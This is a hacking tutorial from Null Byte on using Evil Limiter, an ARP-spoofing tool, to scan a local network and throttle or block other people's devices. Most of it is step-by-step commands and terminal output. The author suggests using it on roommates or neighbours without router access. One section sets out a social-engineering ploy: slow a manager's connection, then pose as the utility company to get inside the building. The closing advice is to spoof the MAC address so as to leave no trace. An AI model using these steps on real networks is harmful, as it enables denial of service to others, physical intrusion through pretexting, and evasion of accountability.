How To: Control Network Traffic with Evil Limiter to Throttle or Kick Off Devices

Control Network Traffic with Evil Limiter to Throttle or Kick Off Devices

If you find yourself with a roommate hogging limited data bandwidth with video games or discover a neighbor has invited themselves into your Wi-Fi network, you can easily take back control of your internet access. Evil Limiter does this by letting you control the bit rate of any device on the same network as you, allowing you to slow or even stop data transfer speeds for them completely.

Generally speaking, the average user doesn't have much visibility over who or what is on their network, so anyone with the password can slip in and start using bandwidth. In other situations, a roommate or family member may be hogging all the bandwidth unfairly to play video games or stream videos. Some routers have web interfaces that allow you to set limits on each connection, but without the password to the router, this option may not be accessible.

Evil Limiter uses ARP spoofing to make devices send data to the attacking computer rather than the router, allowing us to send the data on to the router at whatever speed we like. Thanks to the way the ARP protocol works, it's possible to control the speed of any device on a shared network connection. However, because ARP spoofing only works on IPv4 networks, this tool won't be effective on IPv6 for now.

Evil Limiter for Hackers

For a hacker, Evil Limiter allows easy targeting of either one, a few, or all devices on a network. It's easy to cut the cord on the internet of a particular device at any moment, allowing for a convenient pretext for a social engineering attack. If a hacker wanted access to an employees-only area, they could identify the device of employees in the area they want to be, then limit the speed of their connection.

Rather than showing up unannounced, a hacker could throttle the manager's data connection while pretending to call from the utility company to ask if the internet connection has been slow. When the manager finds the internet is indeed slow, the hacker simply asks the best time to send someone over to fix it, giving them a pretext to enter the building and preventing the target calling the real utility company.

What You'll Need

To use Evil Limiter, you'll need a Linux system like Kali or Ubuntu with Python3 or higher. While a powerful advantage of Evil Limter is that it can be run on networks even when you don't have administrator privileges, I recommend making sure you have permission to run the tool on any network you want to test it on.

Evil Limiter uses the ARP packet to limit connection speeds which is present in IPv4 networks, but not in IPv6 networks. Because of this, IPv6 systems are out of reach of this tool, as mentioned before.

Step 1: Install Evil Limiter

To install Evil Limiter, there are only a few commands to throw in a terminal window, seen below. When the required libraries finish installing, Evil Limiter should be installed and ready to run.

~# git clone https://github.com/bitbrute/evillimiter.git
~# cd evillimiter
~# sudo python3 setup.py install

Step 2: Connect to the Network

Now, you'll need to connect to your target network. Afterward, you can run Evil Limiter by typing evillimiter in a new terminal window. You should see something like below.

~# evillimiter

███████╗██╗   ██╗██╗██╗       ██╗     ██╗███╗   ███╗██╗████████╗███████╗██████╗
██╔════╝██║   ██║██║██║       ██║     ██║████╗ ████║██║╚══██╔══╝██╔════╝██╔══██╗
█████╗  ██║   ██║██║██║       ██║     ██║██╔████╔██║██║   ██║   █████╗  ██████╔╝
██╔══╝  ╚██╗ ██╔╝██║██║       ██║     ██║██║╚██╔╝██║██║   ██║   ██╔══╝  ██╔══██╗
███████╗ ╚████╔╝ ██║███████╗  ███████╗██║██║ ╚═╝ ██║██║   ██║   ███████╗██║  ██║
╚══════╝  ╚═══╝  ╚═╝╚══════╝  ╚══════╝╚═╝╚═╝     ╚═╝╚═╝   ╚═╝   ╚══════╝╚═╝  ╚═╝
                by bitbrute  ~  limit devices on your network :3
                                    v1.1.0

OK   interface: wlan0
OK   gateway ip: 192.168.5.1
OK   gateway mac: 84:██:██:██:██:1a
OK   netmask: 255.255.255.0

type help or ? to show command information.

If you see this, Evil Limiter is installed, connected to the network, and ready to go.

Step 3: View Available Commands

You can explore the functionality of Evil Limiter by looking through the menu system and checking out the available commands. To do so, type a question mark in the terminal to pull up the help page.

(Main) >>> ?

scan                          scans for online hosts on your network.
                              required to find the hosts you want to limit.

hosts                         lists all scanned hosts.
                              contains host information, including IDs.

limit [ID1,ID2,...] [rate]    limits bandwith of host(s) (uload/dload).
                              e.g.: limit 4 100kbit
                                    limit 2,3,4 1gbit
                                    limit all 200kbit

block [ID1,ID2,...]           blocks internet access of host(s).
                              e.g.: block 3,2
                                    block all

free [ID1,ID2,...]            unlimits/unblocks host(s).
                              e.g.: free 3
                                    free all

add [IP] (--mac [MAC])        adds custom host to host list.
                              mac resolved automatically.
                              e.g.: add 192.168.178.24
                                    add 192.168.1.50 --mac 1c:fc:bc:2d:a6:37

clear                         clears the terminal window.

Step 4: Discover Devices

As we can see above, the commands are straightforward. To find devices on the network, all you need to do is type scan.

(Main) >>> scan

100% |██████████████████████████████| 256/256
OK   7 hosts discovered.

The scan will pull up any other hosts on the network. Type hosts to show them all.

(Main) >>> hosts

┌Hosts──────────────┬───────────────────┬──────────┬────────┐
│ ID │ IP-Address   │ MAC-Address       │ Hostname │ Status │
├────┼──────────────┼───────────────────┼──────────┼────────┤
│ 0  │ 192.168.5.1  │ 84:██:██:██:██:1a │ _gateway │ Free   │
│ 1  │ 192.168.5.2  │ 0c:██:██:██:██:f5 │          │ Free   │
│ 2  │ 192.168.5.4  │ 3c:██:██:██:██:6f │          │ Free   │
│ 3  │ 192.168.5.24 │ 60:██:██:██:██:78 │          │ Free   │
│ 4  │ 192.168.5.25 │ c4:██:██:██:██:2b │          │ Free   │
│ 5  │ 192.168.5.61 │ 8c:██:██:██:██:f5 │          │ Free   │
│ 6  │ 192.168.5.67 │ f0:██:██:██:██:b5 │          │ Free   │
└────┴──────────────┴───────────────────┴──────────┴────────┘

In my example, seven devices have been discovered on the network, with one of them being the router. Now we have a target list with which we can block or limit access, so let's give it a try.

Step 5: Limit or Block Devices

If you want to limit every device except the router, you can list them off one by one after the limit command. You'll also have to specify the speed you want to limit them to. In my case, I'll go with 200kbit as the limiting speed.

You could use the limit all command to choose everything, but because you want to leave the router alone, type the command limit 1,2,3,4,5,6 instead to begin limiting those specific devices. The amount of devices you list depends on how many you found.

(Main) >>> limit 1,2,3,4,5,6 200kbit

OK   192.168.5.2 limited to 200kbit.
OK   192.168.5.4 limited to 200kbit.
OK   192.168.5.24 limited to 200kbit.
OK   192.168.5.25 limited to 200kbit.
OK   192.168.5.61 limited to 200kbit.
OK   192.168.5.67 limited to 200kbit.

Now that we've limited some devices, we can also select any devices we want to block entirely from accessing the network. I've found that sometimes Evil Limiter can be heavy-handed while limiting connections, and the result is that devices are limited so much they might as well be blocked.

To block a device, type the block command, then the number of any device you want to prevent from receiving data over the network.

(Main) >>> block 3

OK   192.168.5.24 blocked.

Try hosts a second time. The majority of the network should be blocked or limited.

(Main) >>> hosts

┌Hosts──────────────┬───────────────────┬──────────┬─────────┐
│ ID │ IP-Address   │ MAC-Address       │ Hostname │ Status  │
├────┼──────────────┼───────────────────┼──────────┼─────────┤
│ 0  │ 192.168.5.1  │ 84:██:██:██:██:1a │ _gateway │ Free    │
│ 1  │ 192.168.5.2  │ 0c:██:██:██:██:f5 │          │ Limited │
│ 2  │ 192.168.5.4  │ 3c:██:██:██:██:6f │          │ Limited │
│ 3  │ 192.168.5.24 │ 60:██:██:██:██:78 │          │ Blocked │
│ 4  │ 192.168.5.25 │ c4:██:██:██:██:2b │          │ Limited │
│ 5  │ 192.168.5.61 │ 8c:██:██:██:██:f5 │          │ Limited │
│ 6  │ 192.168.5.67 │ f0:██:██:██:██:b5 │          │ Limited │
└────┴──────────────┴───────────────────┴──────────┴─────────┘

Step 6: Restore Normal Connection

Now that you've caused chaos on the network, it's time to set things back the way they were. Fortunately, doing so is easy. You can choose to either restore devices one by one or run free all to undo any limitations on network devices.

(Main) >>> free all

OK   192.168.5.2 freed.
OK   192.168.5.4 freed.
OK   192.168.5.24 freed.
OK   192.168.5.25 freed.
OK   192.168.5.61 freed.
OK   192.168.5.67 freed.

Run hosts a third time, and network access should be normal again for all devices.

(Main) >>> hosts

┌Hosts──────────────┬───────────────────┬──────────┬────────┐
│ ID │ IP-Address   │ MAC-Address       │ Hostname │ Status │
├────┼──────────────┼───────────────────┼──────────┼────────┤
│ 0  │ 192.168.5.1  │ 84:██:██:██:██:1a │ _gateway │ Free   │
│ 1  │ 192.168.5.2  │ 0c:██:██:██:██:f5 │          │ Free   │
│ 2  │ 192.168.5.4  │ 3c:██:██:██:██:6f │          │ Free   │
│ 3  │ 192.168.5.24 │ 60:██:██:██:██:78 │          │ Free   │
│ 4  │ 192.168.5.25 │ c4:██:██:██:██:2b │          │ Free   │
│ 5  │ 192.168.5.61 │ 8c:██:██:██:██:f5 │          │ Free   │
│ 6  │ 192.168.5.67 │ f0:██:██:██:██:b5 │          │ Free   │
└────┴──────────────┴───────────────────┴──────────┴────────┘

Evil Limiter Is Effective but Aggressive

In my tests with Evil Limiter, I found it to be an extremely effective if sometimes overbearing tool. On occasion, my attempts to limit a target would instead wholly block it, so be sure to test the effectiveness of this tool before using it anywhere important.

One thing to keep in mind when using Evil Limiter is that ARP spoofing exposes your MAC address, so using this tool on a network is effectively telling everyone that your MAC address is the router. That leaves your MAC address in the ARP cache of every machine you're targeting, so make sure to spoof your MAC address before using this tool if you don't want to be leaving your machine's fingerprints all over the network.

I hope you enjoyed this guide to using Evil Limiter! If you have any questions about this tutorial on ARP spoofing, leave a comment below, and feel free to reach me on Twitter @KodyKinzie.

Cover photo and screenshots by Kody/Null Byte

Get The Null Byte Newsletter

Never miss a new hacking or security guide

5 Comments

$ sudo python3 setup.py install

Traceback (most recent call last):
File "setup.py", line 3, in <module>
from setuptools import setup, find_packages, Command
ModuleNotFoundError: No module named 'setuptools'
===================================================
What to do??

$ sudo python3 setup.py install

Traceback (most recent call last):
File "setup.py", line 3, in <module>
from setuptools import setup, find_packages, Command
ModuleNotFoundError: No module named 'setuptools'
===================================================
What to do??

— Karim El Sawy

I ran into this with a specific iso I was using for a VM on Khali.

I ended up reinstalling Khali and everything is working fine.

try to install:

sudo apt-get install python-setuptools

ERR default interface could not be resolved. specify manually (-i). I have this problem after opening sudo evillimiter, can anyone help me?

Share Your Thoughts

  • Hot
  • Latest